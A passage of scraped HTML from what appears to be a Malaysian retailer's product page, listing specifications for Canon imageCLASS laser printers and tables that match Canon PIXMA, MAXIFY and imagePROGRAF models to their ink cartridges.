with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL 